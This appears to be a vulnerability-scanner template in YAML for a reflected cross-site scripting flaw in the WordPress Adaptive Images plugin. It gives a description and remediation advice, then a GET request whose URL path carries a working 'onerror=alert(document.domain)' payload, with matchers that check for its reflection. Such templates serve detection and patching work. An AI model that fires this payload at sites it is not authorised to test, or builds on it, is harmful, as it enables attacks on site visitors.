id: wp-adaptive-xss
info:
  name: WordPress Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Adaptive Images Cross-Site Scripting Vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.

    WordPress plugin Adaptive Images 0.6.69 and earlier versions have a cross-site scripting vulnerability. The vulnerability occurs because the plugin does not sanitize and escape parameters on the reset password form. An attacker could exploit this vulnerability to perform cross-site scripting attacks.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: http://wordpress.org/extend/plugins/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: word
    condition: and
    words:
    - <img/src/onerror=alert(document.domain)>
    - <td>Image</td>
  - type: word
    part: header
    words:
    - text/html
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true'
  method: GET
